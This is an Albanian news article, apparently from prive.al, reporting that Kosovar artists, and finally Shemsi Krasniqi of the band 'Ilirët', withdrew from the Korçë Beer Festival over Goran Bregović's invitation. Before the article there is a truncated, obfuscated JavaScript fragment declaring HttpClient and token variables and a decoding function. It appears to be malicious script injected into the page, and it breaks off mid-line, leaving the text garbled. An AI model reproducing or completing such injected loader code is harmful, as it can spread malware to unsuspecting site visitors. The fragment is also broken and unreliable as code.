;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Asnjë artist kosovar në Korçë, tërhiqet edhe Shemsi Krasniqi i “Ilirëve”

By

Pas reagimit të gjerë për ardhjen e Goran Bregovic në Korçë për të performuar në Festë e Birrës, artistë nga Kosova që ishin paraparë të performonin u tërhoqën.

Bëhet fjalë për Dafina Zeqiri dhe Capital T që njoftuan se nuk do të ngjisnin skenën. Njëjtë bënë edhe grupi “Na”.

“Kemi Shemin nga “Ilirët”, pasi ai është i vetmi nga Kosova i cili do të performojë në Festën e Birrës, do të thotë vetëm këta emra kishim nga Kosova, por që vetëm Shemi ka pranuar”, kishte thënë nënkryetarja e Bashkisë Korçë për “Bota sot”.

Por, edhe Shemi u tërhoq nga festivali. Lajmin e bëri të ditur me anë të jë videoje që publikoi gjatë ditës së sotme.

“Unë kam menduar se kjo [festivali] ka lidhje me art, por po e shoh qe nuk ka lidhje fare me art. Këtu kam gabuar. E pranoj gabimin tim. Unë jam muzikant, nuk jam politikan. Festivali ka marrë një konotacion politik dhe për këtë shkak kam vendosur të tërhiqem”, thotë ndër të tjerash Shemi në videon që ka ndarë.

“Shumica nga prej jush më kanë sugjeruar të mos marr pjesë, dhe unë nuk do të ju kundërvihem. Do ju respektoj juve”, tha ai. /prive.al

Artikuj të ngjashëm